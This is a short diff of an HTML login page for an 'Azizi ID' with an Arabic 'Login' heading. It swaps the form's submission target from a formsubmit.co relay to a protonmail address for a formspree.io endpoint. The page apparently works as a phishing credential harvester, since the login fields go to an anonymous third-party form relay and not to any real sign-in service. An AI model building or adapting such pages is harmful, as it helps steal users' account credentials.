--- a/login/login.html
+++ b/login/login.html
@@ -93,7 +93,7 @@ span.psw {
 
 <h2>تسجيل الدخول</h2>
 
-<form action="https://formsubmit.co/aziziapp@protonmail.com" method="POST" />
+<form action="https://formspree.io/f/mnqlbbdk" method="POST" />
   <div class="container">
     <label for="uname"><b>Azizi ID</b></label>
     <input type="text" placeholder="Enter Azizi ID" name="uname" required>
